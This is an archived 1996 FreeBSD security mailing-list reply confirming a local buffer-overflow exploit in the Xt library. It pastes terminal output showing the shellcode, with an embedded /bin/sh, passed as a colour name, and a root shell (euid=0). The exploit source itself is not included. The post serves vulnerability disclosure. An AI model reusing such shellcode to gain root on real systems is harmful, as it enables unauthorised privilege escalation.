Date: Sun, 25 Aug 1996 13:48:21 +0200 From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@FreeBSD.ORG Cc: security-officer@FreeBSD.ORG Subject: Re: Vulnerability in the Xt library (fwd) Message-ID: <199608251148.NAA25686@keltia.freenix.fr> In-Reply-To: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>; from Kent Hamilton on Aug 25, 1996 1:05:20 -0500 References: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>
next in thread | previous in thread | raw e-mail | index | archive | help
--Tkw3iuTSQTdrZTDt Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable According to Kent Hamilton: > Thought this might be of interest. I confirm that it works like a charm here :-( =20 357 [13:44] roberto@keltia:~/src/C> ./exploit=20 Using offset of esp + 0 (efbfd3b0) Buffer size 1491 Warning: Color name "=EB#^^ 1=D2VVVV1=C0=B0;N =CARQSP=EB=E8=D8=FF=FF=FF/bin/sh=B4=D3= =BF=EF=B4=D3=BF=EF=EB#^^ 1=D2VVVV1= =C0=B0;N = =CARQSP=EB=E8=D8=FF=FF=FF/bin/sh=B4=D3=BF=EF=B4=D3=BFH=B3=BF=EF! # id uid=3D101(roberto) euid=3D0(root) gid=3D10(staff) groups=3D10(staff), 0(whe= el), 2(kmem), 5(operator), 6(man), 8(news), 15(cvs), 20(majordom), 21(list)= , 100(copains), 117(dialer), 2000(dos), 2001(tex) I saw the discussion on Bugtraq. There are a lot of fixed buffers in X as I recall. --=20 Ollivier ROBERT -=3D- The daemon is FREE! -=3D- roberto@keltia.freeni= x.fr FreeBSD keltia.freenix.fr 2.2-CURRENT #18: Sun Aug 18 19:16:52 MET DST 1996 --Tkw3iuTSQTdrZTDt Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia iQCVAwUBMiA9gwDy2QnruxtBAQGybgP/SFbjUahCvBxn2C7SR8irUwKquF6mOdcS Z4skE4JF8m1Lf86Nn9ixxs0WIpVtLMQcP5AcijkiMQGPHhwBgRTqPJcTOufkfpP0 9y1iKxWMnB4zxgxpJbT1DHOVhrKRqbbn1xHO/W+i6eH6WHrLRKyCC1j7k1YZBLL4 YQr0Z9n5Bo4= =sX2i -----END PGP SIGNATURE----- --Tkw3iuTSQTdrZTDt--
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199608251148.NAA25686>